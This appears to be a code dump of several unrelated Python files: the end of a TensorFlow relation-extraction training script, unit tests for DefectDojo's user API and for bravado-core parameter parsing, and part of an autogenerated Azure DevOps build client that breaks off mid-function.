			x_batch = np.zeros((config.instanceTot,config.sequence_size), dtype = np.int32)
			p_t_batch = np.zeros((config.instanceTot,config.sequence_size), dtype = np.int32)
			p_h_batch = np.zeros((config.instanceTot,config.sequence_size), dtype = np.int32)
			r_batch = np.zeros((1, 1), dtype = np.int32)
			y_batch = np.zeros((1, config.num_classes), dtype = np.int32)
			r_n_batch = np.zeros((1, 1), dtype = np.float32)
			h_batch = np.zeros((1, 1), dtype = np.int32)
			t_batch = np.zeros((1, 1), dtype = np.int32)
			x_batch_addr = x_batch.__array_interface__['data'][0]
			p_t_batch_addr = p_t_batch.__array_interface__['data'][0]
			p_h_batch_addr = p_h_batch.__array_interface__['data'][0]
			y_batch_addr = y_batch.__array_interface__['data'][0]
			r_batch_addr = r_batch.__array_interface__['data'][0]
			r_n_batch_addr = r_n_batch.__array_interface__['data'][0]
			h_batch_addr = h_batch.__array_interface__['data'][0]
			t_batch_addr = t_batch.__array_interface__['data'][0]
			lib_cnn.batch_iter.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p]
			tipTotal = lib_cnn.getTipTotal()
			loop = 0
			def train_cnn(coord):
				# CNN thread: one bag per step; prints running loss and
				# accuracies split into NA / non-NA bags every 1000 bags.
				def train_step_cnn(x_batch, p_h_batch, p_t_batch, y_batch, r_batch, r_n_batch, h_batch, t_batch):
					# (bags_hit is listed twice in the global list; harmless.)
					global bags_sum, bags_hit, loss_sum, bags_hit_NA, bags_hit, sum_fNA, sum_NA
					feed_dict = {
						m.input_x: x_batch,
						m.input_p_h: p_h_batch,
						m.input_p_t: p_t_batch,
						m.input_r: r_batch,
						m.input_r_n: r_n_batch,
						m.input_y: y_batch,
						m.input_h: h_batch,
						m.input_t: t_batch
					}
					_, step, loss, accuracy = sess.run(
						[train_op_cnn, global_step_cnn, m.loss_cnn, m.accuracy], feed_dict)
					time_str = datetime.datetime.now().isoformat()
					loss_sum += loss
					bags_sum += 1
					if (r_batch[0]!=config.NA):
						sum_fNA += 1
						if accuracy > 0.5:
							bags_hit += 1.0
					else:
						sum_NA += 1
						if accuracy > 0.5:
							bags_hit_NA += 1.0
					if bags_sum % 1000 == 0:
						# Guard the divisions below against empty buckets.
						if (sum_NA == 0):
							sum_NA+=1
						if (sum_fNA == 0):
							sum_fNA+=1
						print("{}: step {}, loss {:g}, acc {:g} acc {:g} {} {}".format(time_str, step, loss_sum/bags_sum, bags_hit_NA/sum_NA, bags_hit/sum_fNA, sum_NA, sum_fNA))
				global loop
				while not coord.should_stop():
					# Python 2 print statement (this script targets Python 2).
					print 'Looping ', loop
					# Snapshot all parameters at the start of each epoch.
					outEmbedding(str(loop))
					for i in range(tipTotal):
						length = lib_cnn.batch_iter(x_batch_addr, p_h_batch_addr, p_t_batch_addr, y_batch_addr, r_batch_addr, r_n_batch_addr, h_batch_addr, t_batch_addr)
						train_step_cnn(x_batch[0:length,], p_h_batch[0:length,], p_t_batch[0:length,], y_batch, r_batch, r_n_batch, h_batch, t_batch)
					# Reset the running statistics at each epoch boundary.
					global bags_sum, bags_hit, loss_sum, bags_hit_NA, bags_hit, sum_fNA, sum_NA
					bags_sum = 0
					bags_hit = 0
					bags_hit_NA = 0
					loss_sum = 0
					sum_fNA = 0
					sum_NA = 0
					loop += 1
					if loop == config.trainTimes:
						coord.request_stop()
			# KG-side triple buffers, also filled in place by the C sampler.
			ph = np.zeros(config.batch_size * 2, dtype = np.int32)
			pt = np.zeros(config.batch_size * 2, dtype = np.int32)
			pr = np.zeros(config.batch_size * 2, dtype = np.int32)
			nh = np.zeros(config.batch_size * 2, dtype = np.int32)
			nt = np.zeros(config.batch_size * 2, dtype = np.int32)
			nr = np.zeros(config.batch_size * 2, dtype = np.int32)
			ph_addr = ph.__array_interface__['data'][0]
			pt_addr = pt.__array_interface__['data'][0]
			pr_addr = pr.__array_interface__['data'][0]
			nh_addr = nh.__array_interface__['data'][0]
			nt_addr = nt.__array_interface__['data'][0]
			nr_addr = nr.__array_interface__['data'][0]
			lib_kg.getBatch.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int]
			times_kg = 0
			def train_kg(coord):
				# KG thread: keeps running TransE mini-batches until the CNN
				# thread requests a stop after config.trainTimes epochs.
				def train_step_kg(pos_h_batch, pos_t_batch, pos_r_batch, neg_h_batch, neg_t_batch, neg_r_batch):
					feed_dict = {
						m.pos_h: pos_h_batch,
						m.pos_t: pos_t_batch,
						m.pos_r: pos_r_batch,
						m.neg_h: neg_h_batch,
						m.neg_t: neg_t_batch,
						m.neg_r: neg_r_batch
					}
					_, step, loss = sess.run(
						[train_op_kg, global_step_kg, m.loss_kg], feed_dict)
					return loss
				global times_kg
				while not coord.should_stop():
					times_kg += 1
					res = 0.0
					for batch in range(config.nbatches):
						lib_kg.getBatch(ph_addr, pt_addr, pr_addr, nh_addr, nt_addr, nr_addr, config.batch_size)
						res += train_step_kg(ph, pt, pr, nh, nt, nr)
			# Run both objectives concurrently; join until the CNN thread
			# signals completion via the coordinator.
			coord = tf.train.Coordinator()
			threads = []
			threads.append(threading.Thread(target=train_kg, args=(coord,)))
			threads.append(threading.Thread(target=train_cnn, args=(coord,)))
			for t in threads: t.start()
			coord.join(threads)
|
unittests/test_apiv2_user.py | mtcolman/django-DefectDojo | 249 | 9910 | <reponame>mtcolman/django-DefectDojo
from rest_framework.test import APITestCase, APIClient
from django.urls import reverse
from rest_framework.authtoken.models import Token
class UserTest(APITestCase):
    """
    Test the User APIv2 endpoint.
    """
    # Seed data; includes the 'admin' user whose token is used below.
    fixtures = ['dojo_testdata.json']

    def setUp(self):
        # Authenticate every request in this class as admin via token auth.
        token = Token.objects.get(user__username='admin')
        self.client = APIClient()
        self.client.credentials(HTTP_AUTHORIZATION='Token ' + token.key)

    def test_user_list(self):
        # Listing users must expose profile fields but never the password.
        r = self.client.get(reverse('user-list'))
        self.assertEqual(r.status_code, 200, r.content[:1000])
        user_list = r.json()['results']
        self.assertTrue(len(user_list) >= 1, r.content[:1000])
        for user in user_list:
            for item in ['username', 'first_name', 'last_name', 'email']:
                self.assertIn(item, user, r.content[:1000])
            for item in ['password']:
                self.assertNotIn(item, user, r.content[:1000])

    def test_user_add(self):
        # simple user without password
        r = self.client.post(reverse('user-list'), {
            "username": "api-user-1"
        }, format='json')
        self.assertEqual(r.status_code, 201, r.content[:1000])

        # user with good password
        password = '<PASSWORD>!@#$'
        r = self.client.post(reverse('user-list'), {
            "username": "api-user-2",
            "password": password
        }, format='json')
        self.assertEqual(r.status_code, 201, r.content[:1000])

        # test password by fetching API key
        r = self.client.post(reverse('api-token-auth'), {
            "username": "api-user-2",
            "password": password
        }, format='json')
        self.assertEqual(r.status_code, 200, r.content[:1000])

        # user with weak password: creation must be rejected with a
        # validation message from the password policy.
        r = self.client.post(reverse('user-list'), {
            "username": "api-user-3",
            "password": "<PASSWORD>"
        }, format='json')
        self.assertEqual(r.status_code, 400, r.content[:1000])
        self.assertIn('The password must contain at least 1 digit, 0-9.', r.content.decode("utf-8"))

    def test_user_change_password(self):
        # some user
        r = self.client.post(reverse('user-list'), {
            "username": "api-user-4"
        }, format='json')
        self.assertEqual(r.status_code, 201, r.content[:1000])
        user_id = r.json()['id']

        # Profile fields may be updated via PUT and PATCH...
        r = self.client.put("{}{}/".format(reverse('user-list'), user_id), {
            "username": "api-user-4",
            "first_name": "first"
        }, format='json',)
        self.assertEqual(r.status_code, 200, r.content[:1000])

        r = self.client.patch("{}{}/".format(reverse('user-list'), user_id), {
            "last_name": "last"
        }, format='json')
        self.assertEqual(r.status_code, 200, r.content[:1000])

        # ...but password changes must be rejected on both verbs.
        # (The asserted message matches the server's text verbatim,
        # including its "though"-for-"through" typo.)
        r = self.client.put("{}{}/".format(reverse('user-list'), user_id), {
            "username": "api-user-4",
            "password": "<PASSWORD>!@#$"
        }, format='json')
        self.assertEqual(r.status_code, 400, r.content[:1000])
        self.assertIn("Update of password though API is not allowed", r.content.decode("utf-8"))

        r = self.client.patch("{}{}/".format(reverse('user-list'), user_id), {
            "password": "<PASSWORD>!@#$"
        }, format='json')
        self.assertEqual(r.status_code, 400, r.content[:1000])
        self.assertIn("Update of password though API is not allowed", r.content.decode("utf-8"))
|
tests/param/get_param_type_spec_test.py | nickgaya/bravado-core | 122 | 9926 | # -*- coding: utf-8 -*-
import pytest
from mock import Mock
from bravado_core.exception import SwaggerMappingError
from bravado_core.operation import Operation
from bravado_core.param import get_param_type_spec
from bravado_core.param import Param
from bravado_core.spec import Spec
@pytest.fixture
def body_param_spec():
    """A minimal Swagger 2.0 'body' parameter spec with a string schema."""
    return {
        'name': 'body',
        'in': 'body',
        'description': 'pet id',
        'required': True,
        'schema': {
            'type': 'string',
        },
    }
def test_location_is_body(empty_swagger_spec, body_param_spec):
    """A body parameter's type spec is its nested 'schema' object."""
    op = Mock(spec=Operation)
    param = Param(empty_swagger_spec, op, body_param_spec)
    assert get_param_type_spec(param) == body_param_spec['schema']
def test_location_is_not_body(empty_swagger_spec):
    """For non-body locations, the parameter spec itself is the type spec."""
    base_spec = {
        'name': 'petId',
        'description': 'ID of pet that needs to be updated',
        'required': True,
        'type': 'string',
    }
    for location in ('path', 'query', 'header', 'formData',):
        param_spec = dict(base_spec, **{'in': location})
        param = Param(empty_swagger_spec, Mock(spec=Operation), param_spec)
        assert get_param_type_spec(param) == param_spec
def test_location_invalid(empty_swagger_spec, body_param_spec):
    """An unrecognized 'in' location raises SwaggerMappingError naming it."""
    body_param_spec['in'] = 'foo'
    param = Param(empty_swagger_spec, Mock(spec=Operation), body_param_spec)
    with pytest.raises(SwaggerMappingError) as excinfo:
        get_param_type_spec(param)
    message = str(excinfo.value)
    assert 'location foo' in message
def test_ref(minimal_swagger_dict, body_param_spec):
    """$ref parameters are resolved before extracting the type spec."""
    minimal_swagger_dict['parameters'] = {'PetIdParam': body_param_spec}
    swagger_spec = Spec(minimal_swagger_dict)
    ref_spec = {'$ref': '#/parameters/PetIdParam'}
    param = Param(swagger_spec, Mock(spec=Operation), ref_spec)
    assert get_param_type_spec(param) == {'type': 'string'}
|
azure-devops/azure/devops/released/build/build_client.py | imafidon2020/azure-devops-python-api | 248 | 9934 | <filename>azure-devops/azure/devops/released/build/build_client.py
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from msrest import Serializer, Deserializer
from ...client import Client
from ...v5_1.build import models
class BuildClient(Client):
"""Build
:param str base_url: Service URL
:param Authentication creds: Authenticated credentials.
"""
    def __init__(self, base_url=None, creds=None):
        super(BuildClient, self).__init__(base_url, creds)
        # Build (de)serializers over every model class exported by the
        # v5_1 build models module.
        client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
        self._serialize = Serializer(client_models)
        self._deserialize = Deserializer(client_models)

    # Resource area GUID of the Build service, used for request routing.
    resource_area_identifier = '965220d5-5bb9-42cf-8d67-9b146df2a5a4'
    def create_artifact(self, artifact, project, build_id):
        """CreateArtifact.
        Associates an artifact with a build.
        :param :class:`<BuildArtifact> <azure.devops.v5_1.build.models.BuildArtifact>` artifact: The artifact.
        :param str project: Project ID or project name
        :param int build_id: The ID of the build.
        :rtype: :class:`<BuildArtifact> <azure.devops.v5_1.build.models.BuildArtifact>`
        """
        # Values substituted into the URL route template for this location.
        route_values = {}
        if project is not None:
            route_values['project'] = self._serialize.url('project', project, 'str')
        if build_id is not None:
            route_values['buildId'] = self._serialize.url('build_id', build_id, 'int')
        # Serialize the model into the JSON request body.
        content = self._serialize.body(artifact, 'BuildArtifact')
        response = self._send(http_method='POST',
                              location_id='1db06c96-014e-44e1-ac91-90b2d4b3e984',
                              version='5.1',
                              route_values=route_values,
                              content=content)
        return self._deserialize('BuildArtifact', response)
    def get_artifact(self, project, build_id, artifact_name):
        """GetArtifact.
        Gets a specific artifact for a build.
        :param str project: Project ID or project name
        :param int build_id: The ID of the build.
        :param str artifact_name: The name of the artifact.
        :rtype: :class:`<BuildArtifact> <azure.devops.v5_1.build.models.BuildArtifact>`
        """
        # Values substituted into the URL route template for this location.
        route_values = {}
        if project is not None:
            route_values['project'] = self._serialize.url('project', project, 'str')
        if build_id is not None:
            route_values['buildId'] = self._serialize.url('build_id', build_id, 'int')
        # Query-string parameters.
        query_parameters = {}
        if artifact_name is not None:
            query_parameters['artifactName'] = self._serialize.query('artifact_name', artifact_name, 'str')
        response = self._send(http_method='GET',
                              location_id='1db06c96-014e-44e1-ac91-90b2d4b3e984',
                              version='5.1',
                              route_values=route_values,
                              query_parameters=query_parameters)
        return self._deserialize('BuildArtifact', response)
    def get_artifact_content_zip(self, project, build_id, artifact_name, **kwargs):
        """GetArtifactContentZip.
        Gets a specific artifact for a build as a zip stream.
        :param str project: Project ID or project name
        :param int build_id: The ID of the build.
        :param str artifact_name: The name of the artifact.
        :param callable callback: optional kwarg; invoked per downloaded chunk.
        :rtype: object
        """
        # Values substituted into the URL route template for this location.
        route_values = {}
        if project is not None:
            route_values['project'] = self._serialize.url('project', project, 'str')
        if build_id is not None:
            route_values['buildId'] = self._serialize.url('build_id', build_id, 'int')
        query_parameters = {}
        if artifact_name is not None:
            query_parameters['artifactName'] = self._serialize.query('artifact_name', artifact_name, 'str')
        # Request a zip payload; the response is consumed as a stream below.
        response = self._send(http_method='GET',
                              location_id='1db06c96-014e-44e1-ac91-90b2d4b3e984',
                              version='5.1',
                              route_values=route_values,
                              query_parameters=query_parameters,
                              accept_media_type='application/zip')
        if "callback" in kwargs:
            callback = kwargs["callback"]
        else:
            callback = None
        return self._client.stream_download(response, callback=callback)
    def get_artifacts(self, project, build_id):
        """GetArtifacts.
        Gets all artifacts for a build.
        :param str project: Project ID or project name
        :param int build_id: The ID of the build.
        :rtype: [BuildArtifact]
        """
        # Values substituted into the URL route template for this location.
        route_values = {}
        if project is not None:
            route_values['project'] = self._serialize.url('project', project, 'str')
        if build_id is not None:
            route_values['buildId'] = self._serialize.url('build_id', build_id, 'int')
        response = self._send(http_method='GET',
                              location_id='1db06c96-014e-44e1-ac91-90b2d4b3e984',
                              version='5.1',
                              route_values=route_values)
        # The service wraps list results in an envelope; unwrap before
        # deserializing into model objects.
        return self._deserialize('[BuildArtifact]', self._unwrap_collection(response))
    def get_file(self, project, build_id, artifact_name, file_id, file_name, **kwargs):
        """GetFile.
        Gets a file from the build.
        :param str project: Project ID or project name
        :param int build_id: The ID of the build.
        :param str artifact_name: The name of the artifact.
        :param str file_id: The primary key for the file.
        :param str file_name: The name that the file will be set to.
        :param callable callback: optional kwarg; invoked per downloaded chunk.
        :rtype: object
        """
        # Values substituted into the URL route template for this location.
        route_values = {}
        if project is not None:
            route_values['project'] = self._serialize.url('project', project, 'str')
        if build_id is not None:
            route_values['buildId'] = self._serialize.url('build_id', build_id, 'int')
        # Query-string parameters.
        query_parameters = {}
        if artifact_name is not None:
            query_parameters['artifactName'] = self._serialize.query('artifact_name', artifact_name, 'str')
        if file_id is not None:
            query_parameters['fileId'] = self._serialize.query('file_id', file_id, 'str')
        if file_name is not None:
            query_parameters['fileName'] = self._serialize.query('file_name', file_name, 'str')
        # Request raw bytes; the response is consumed as a stream below.
        response = self._send(http_method='GET',
                              location_id='1db06c96-014e-44e1-ac91-90b2d4b3e984',
                              version='5.1',
                              route_values=route_values,
                              query_parameters=query_parameters,
                              accept_media_type='application/octet-stream')
        if "callback" in kwargs:
            callback = kwargs["callback"]
        else:
            callback = None
        return self._client.stream_download(response, callback=callback)
def delete_build(self, project, build_id):
    """DeleteBuild.
    Permanently removes a build.
    :param str project: Project ID or project name
    :param int build_id: The ID of the build.
    """
    route = {}
    if project is not None:
        route['project'] = self._serialize.url('project', project, 'str')
    if build_id is not None:
        route['buildId'] = self._serialize.url('build_id', build_id, 'int')
    self._send(
        http_method='DELETE',
        location_id='0cd358e1-9217-4d94-8269-1c1ee6f93dcf',
        version='5.1',
        route_values=route)
def get_build(self, project, build_id, property_filters=None):
    """GetBuild.
    Fetches a single build by its ID.
    :param str project: Project ID or project name
    :param int build_id:
    :param str property_filters:
    :rtype: :class:`<Build> <azure.devops.v5_1.build.models.Build>`
    """
    route = {}
    if project is not None:
        route['project'] = self._serialize.url('project', project, 'str')
    if build_id is not None:
        route['buildId'] = self._serialize.url('build_id', build_id, 'int')
    query = {}
    if property_filters is not None:
        query['propertyFilters'] = self._serialize.query('property_filters', property_filters, 'str')
    response = self._send(
        http_method='GET',
        location_id='0cd358e1-9217-4d94-8269-1c1ee6f93dcf',
        version='5.1',
        route_values=route,
        query_parameters=query)
    return self._deserialize('Build', response)
def get_builds(self, project, definitions=None, queues=None, build_number=None, min_time=None, max_time=None, requested_for=None, reason_filter=None, status_filter=None, result_filter=None, tag_filters=None, properties=None, top=None, continuation_token=None, max_builds_per_definition=None, deleted_filter=None, query_order=None, branch_name=None, build_ids=None, repository_id=None, repository_type=None):
    """GetBuilds.
    Retrieves a (possibly filtered) page of builds.
    :param str project: Project ID or project name
    :param [int] definitions: A comma-delimited list of definition IDs. If specified, filters to builds for these definitions.
    :param [int] queues: A comma-delimited list of queue IDs. If specified, filters to builds that ran against these queues.
    :param str build_number: If specified, filters to builds that match this build number. Append * to do a prefix search.
    :param datetime min_time: If specified, filters to builds that finished/started/queued after this date based on the queryOrder specified.
    :param datetime max_time: If specified, filters to builds that finished/started/queued before this date based on the queryOrder specified.
    :param str requested_for: If specified, filters to builds requested for the specified user.
    :param str reason_filter: If specified, filters to builds that match this reason.
    :param str status_filter: If specified, filters to builds that match this status.
    :param str result_filter: If specified, filters to builds that match this result.
    :param [str] tag_filters: A comma-delimited list of tags. If specified, filters to builds that have the specified tags.
    :param [str] properties: A comma-delimited list of properties to retrieve.
    :param int top: The maximum number of builds to return.
    :param str continuation_token: A continuation token, returned by a previous call to this method, that can be used to return the next set of builds.
    :param int max_builds_per_definition: The maximum number of builds to return per definition.
    :param str deleted_filter: Indicates whether to exclude, include, or only return deleted builds.
    :param str query_order: The order in which builds should be returned.
    :param str branch_name: If specified, filters to builds that built branches that built this branch.
    :param [int] build_ids: A comma-delimited list that specifies the IDs of builds to retrieve.
    :param str repository_id: If specified, filters to builds that built from this repository.
    :param str repository_type: If specified, filters to builds that built from repositories of this type.
    :rtype: :class:`<GetBuildsResponseValue>`
    """
    route = {}
    if project is not None:
        route['project'] = self._serialize.url('project', project, 'str')
    query = {}

    def _put(wire_name, py_name, value, kind):
        # Serialize and record a query parameter only when it was supplied.
        if value is not None:
            query[wire_name] = self._serialize.query(py_name, value, kind)

    _put('definitions', 'definitions', None if definitions is None else ",".join(str(d) for d in definitions), 'str')
    _put('queues', 'queues', None if queues is None else ",".join(str(q) for q in queues), 'str')
    _put('buildNumber', 'build_number', build_number, 'str')
    _put('minTime', 'min_time', min_time, 'iso-8601')
    _put('maxTime', 'max_time', max_time, 'iso-8601')
    _put('requestedFor', 'requested_for', requested_for, 'str')
    _put('reasonFilter', 'reason_filter', reason_filter, 'str')
    _put('statusFilter', 'status_filter', status_filter, 'str')
    _put('resultFilter', 'result_filter', result_filter, 'str')
    _put('tagFilters', 'tag_filters', None if tag_filters is None else ",".join(tag_filters), 'str')
    _put('properties', 'properties', None if properties is None else ",".join(properties), 'str')
    _put('$top', 'top', top, 'int')
    _put('continuationToken', 'continuation_token', continuation_token, 'str')
    _put('maxBuildsPerDefinition', 'max_builds_per_definition', max_builds_per_definition, 'int')
    _put('deletedFilter', 'deleted_filter', deleted_filter, 'str')
    _put('queryOrder', 'query_order', query_order, 'str')
    _put('branchName', 'branch_name', branch_name, 'str')
    _put('buildIds', 'build_ids', None if build_ids is None else ",".join(str(b) for b in build_ids), 'str')
    _put('repositoryId', 'repository_id', repository_id, 'str')
    _put('repositoryType', 'repository_type', repository_type, 'str')
    response = self._send(
        http_method='GET',
        location_id='0cd358e1-9217-4d94-8269-1c1ee6f93dcf',
        version='5.1',
        route_values=route,
        query_parameters=query)
    builds = self._deserialize('[Build]', self._unwrap_collection(response))
    token = self._get_continuation_token(response)
    return self.GetBuildsResponseValue(builds, token)
class GetBuildsResponseValue(object):
    """Paged result wrapper returned by the get_builds method."""

    def __init__(self, value, continuation_token):
        """
        :param value: The current page of builds.
        :type value: :class:`<[Build]> <azure.devops.v5_1.build.models.[Build]>`
        :param continuation_token: Token to be used to get the next page of results.
        :type continuation_token: str
        """
        self.value = value
        self.continuation_token = continuation_token
def queue_build(self, build, project, ignore_warnings=None, check_in_ticket=None, source_build_id=None):
    """QueueBuild.
    Queues a new build.
    :param :class:`<Build> <azure.devops.v5_1.build.models.Build>` build:
    :param str project: Project ID or project name
    :param bool ignore_warnings:
    :param str check_in_ticket:
    :param int source_build_id:
    :rtype: :class:`<Build> <azure.devops.v5_1.build.models.Build>`
    """
    route = {}
    if project is not None:
        route['project'] = self._serialize.url('project', project, 'str')
    query = {}
    if ignore_warnings is not None:
        query['ignoreWarnings'] = self._serialize.query('ignore_warnings', ignore_warnings, 'bool')
    if check_in_ticket is not None:
        query['checkInTicket'] = self._serialize.query('check_in_ticket', check_in_ticket, 'str')
    if source_build_id is not None:
        query['sourceBuildId'] = self._serialize.query('source_build_id', source_build_id, 'int')
    payload = self._serialize.body(build, 'Build')
    response = self._send(
        http_method='POST',
        location_id='0cd358e1-9217-4d94-8269-1c1ee6f93dcf',
        version='5.1',
        route_values=route,
        query_parameters=query,
        content=payload)
    return self._deserialize('Build', response)
def update_build(self, build, project, build_id, retry=None):
    """UpdateBuild.
    Applies changes to an existing build.
    :param :class:`<Build> <azure.devops.v5_1.build.models.Build>` build: The build.
    :param str project: Project ID or project name
    :param int build_id: The ID of the build.
    :param bool retry:
    :rtype: :class:`<Build> <azure.devops.v5_1.build.models.Build>`
    """
    route = {}
    if project is not None:
        route['project'] = self._serialize.url('project', project, 'str')
    if build_id is not None:
        route['buildId'] = self._serialize.url('build_id', build_id, 'int')
    query = {}
    if retry is not None:
        query['retry'] = self._serialize.query('retry', retry, 'bool')
    payload = self._serialize.body(build, 'Build')
    response = self._send(
        http_method='PATCH',
        location_id='0cd358e1-9217-4d94-8269-1c1ee6f93dcf',
        version='5.1',
        route_values=route,
        query_parameters=query,
        content=payload)
    return self._deserialize('Build', response)
def update_builds(self, builds, project):
    """UpdateBuilds.
    Applies changes to several builds in one request.
    :param [Build] builds: The builds to update.
    :param str project: Project ID or project name
    :rtype: [Build]
    """
    route = {}
    if project is not None:
        route['project'] = self._serialize.url('project', project, 'str')
    payload = self._serialize.body(builds, '[Build]')
    response = self._send(
        http_method='PATCH',
        location_id='0cd358e1-9217-4d94-8269-1c1ee6f93dcf',
        version='5.1',
        route_values=route,
        content=payload)
    return self._deserialize('[Build]', self._unwrap_collection(response))
def get_build_changes(self, project, build_id, continuation_token=None, top=None, include_source_change=None):
    """GetBuildChanges.
    Retrieves a page of source changes associated with a build.
    :param str project: Project ID or project name
    :param int build_id:
    :param str continuation_token:
    :param int top: The maximum number of changes to return
    :param bool include_source_change:
    :rtype: :class:`<GetBuildChangesResponseValue>`
    """
    route = {}
    if project is not None:
        route['project'] = self._serialize.url('project', project, 'str')
    if build_id is not None:
        route['buildId'] = self._serialize.url('build_id', build_id, 'int')
    query = {}
    if continuation_token is not None:
        query['continuationToken'] = self._serialize.query('continuation_token', continuation_token, 'str')
    if top is not None:
        query['$top'] = self._serialize.query('top', top, 'int')
    if include_source_change is not None:
        query['includeSourceChange'] = self._serialize.query('include_source_change', include_source_change, 'bool')
    response = self._send(
        http_method='GET',
        location_id='54572c7b-bbd3-45d4-80dc-28be08941620',
        version='5.1',
        route_values=route,
        query_parameters=query)
    changes = self._deserialize('[Change]', self._unwrap_collection(response))
    token = self._get_continuation_token(response)
    return self.GetBuildChangesResponseValue(changes, token)
class GetBuildChangesResponseValue(object):
    """Paged result wrapper returned by the get_build_changes method."""

    def __init__(self, value, continuation_token):
        """
        :param value: The current page of changes.
        :type value: :class:`<[Change]> <azure.devops.v5_1.build.models.[Change]>`
        :param continuation_token: Token to be used to get the next page of results.
        :type continuation_token: str
        """
        self.value = value
        self.continuation_token = continuation_token
def get_build_controller(self, controller_id):
    """GetBuildController.
    Fetches a single build controller by its ID.
    :param int controller_id:
    :rtype: :class:`<BuildController> <azure.devops.v5_1.build.models.BuildController>`
    """
    route = {}
    if controller_id is not None:
        route['controllerId'] = self._serialize.url('controller_id', controller_id, 'int')
    response = self._send(
        http_method='GET',
        location_id='fcac1932-2ee1-437f-9b6f-7f696be858f6',
        version='5.1',
        route_values=route)
    return self._deserialize('BuildController', response)
def get_build_controllers(self, name=None):
    """GetBuildControllers.
    Lists build controllers, optionally filtered by name.
    :param str name:
    :rtype: [BuildController]
    """
    query = {}
    if name is not None:
        query['name'] = self._serialize.query('name', name, 'str')
    response = self._send(
        http_method='GET',
        location_id='fcac1932-2ee1-437f-9b6f-7f696be858f6',
        version='5.1',
        query_parameters=query)
    return self._deserialize('[BuildController]', self._unwrap_collection(response))
def create_definition(self, definition, project, definition_to_clone_id=None, definition_to_clone_revision=None):
    """CreateDefinition.
    Creates a new build definition, optionally cloned from an existing one.
    :param :class:`<BuildDefinition> <azure.devops.v5_1.build.models.BuildDefinition>` definition: The definition.
    :param str project: Project ID or project name
    :param int definition_to_clone_id:
    :param int definition_to_clone_revision:
    :rtype: :class:`<BuildDefinition> <azure.devops.v5_1.build.models.BuildDefinition>`
    """
    route = {}
    if project is not None:
        route['project'] = self._serialize.url('project', project, 'str')
    query = {}
    if definition_to_clone_id is not None:
        query['definitionToCloneId'] = self._serialize.query('definition_to_clone_id', definition_to_clone_id, 'int')
    if definition_to_clone_revision is not None:
        query['definitionToCloneRevision'] = self._serialize.query('definition_to_clone_revision', definition_to_clone_revision, 'int')
    payload = self._serialize.body(definition, 'BuildDefinition')
    response = self._send(
        http_method='POST',
        location_id='dbeaf647-6167-421a-bda9-c9327b25e2e6',
        version='5.1',
        route_values=route,
        query_parameters=query,
        content=payload)
    return self._deserialize('BuildDefinition', response)
def delete_definition(self, project, definition_id):
    """DeleteDefinition.
    Deletes a definition together with all of its builds.
    :param str project: Project ID or project name
    :param int definition_id: The ID of the definition.
    """
    route = {}
    if project is not None:
        route['project'] = self._serialize.url('project', project, 'str')
    if definition_id is not None:
        route['definitionId'] = self._serialize.url('definition_id', definition_id, 'int')
    self._send(
        http_method='DELETE',
        location_id='dbeaf647-6167-421a-bda9-c9327b25e2e6',
        version='5.1',
        route_values=route)
def get_definition(self, project, definition_id, revision=None, min_metrics_time=None, property_filters=None, include_latest_builds=None):
    """GetDefinition.
    Fetches a build definition, optionally at a specific revision.
    :param str project: Project ID or project name
    :param int definition_id: The ID of the definition.
    :param int revision: The revision number to retrieve. If this is not specified, the latest version will be returned.
    :param datetime min_metrics_time: If specified, indicates the date from which metrics should be included.
    :param [str] property_filters: A comma-delimited list of properties to include in the results.
    :param bool include_latest_builds:
    :rtype: :class:`<BuildDefinition> <azure.devops.v5_1.build.models.BuildDefinition>`
    """
    route = {}
    if project is not None:
        route['project'] = self._serialize.url('project', project, 'str')
    if definition_id is not None:
        route['definitionId'] = self._serialize.url('definition_id', definition_id, 'int')
    query = {}
    if revision is not None:
        query['revision'] = self._serialize.query('revision', revision, 'int')
    if min_metrics_time is not None:
        query['minMetricsTime'] = self._serialize.query('min_metrics_time', min_metrics_time, 'iso-8601')
    if property_filters is not None:
        # The service expects a single comma-delimited string.
        joined_filters = ",".join(property_filters)
        query['propertyFilters'] = self._serialize.query('property_filters', joined_filters, 'str')
    if include_latest_builds is not None:
        query['includeLatestBuilds'] = self._serialize.query('include_latest_builds', include_latest_builds, 'bool')
    response = self._send(
        http_method='GET',
        location_id='dbeaf647-6167-421a-bda9-c9327b25e2e6',
        version='5.1',
        route_values=route,
        query_parameters=query)
    return self._deserialize('BuildDefinition', response)
def get_definitions(self, project, name=None, repository_id=None, repository_type=None, query_order=None, top=None, continuation_token=None, min_metrics_time=None, definition_ids=None, path=None, built_after=None, not_built_after=None, include_all_properties=None, include_latest_builds=None, task_id_filter=None, process_type=None, yaml_filename=None):
    """GetDefinitions.
    Retrieves a (possibly filtered) page of build definitions.
    :param str project: Project ID or project name
    :param str name: If specified, filters to definitions whose names match this pattern.
    :param str repository_id: A repository ID. If specified, filters to definitions that use this repository.
    :param str repository_type: If specified, filters to definitions that have a repository of this type.
    :param str query_order: Indicates the order in which definitions should be returned.
    :param int top: The maximum number of definitions to return.
    :param str continuation_token: A continuation token, returned by a previous call to this method, that can be used to return the next set of definitions.
    :param datetime min_metrics_time: If specified, indicates the date from which metrics should be included.
    :param [int] definition_ids: A comma-delimited list that specifies the IDs of definitions to retrieve.
    :param str path: If specified, filters to definitions under this folder.
    :param datetime built_after: If specified, filters to definitions that have builds after this date.
    :param datetime not_built_after: If specified, filters to definitions that do not have builds after this date.
    :param bool include_all_properties: Indicates whether the full definitions should be returned. By default, shallow representations of the definitions are returned.
    :param bool include_latest_builds: Indicates whether to return the latest and latest completed builds for this definition.
    :param str task_id_filter: If specified, filters to definitions that use the specified task.
    :param int process_type: If specified, filters to definitions with the given process type.
    :param str yaml_filename: If specified, filters to YAML definitions that match the given filename.
    :rtype: :class:`<GetDefinitionsResponseValue>`
    """
    route = {}
    if project is not None:
        route['project'] = self._serialize.url('project', project, 'str')
    query = {}

    def _put(wire_name, py_name, value, kind):
        # Serialize and record a query parameter only when it was supplied.
        if value is not None:
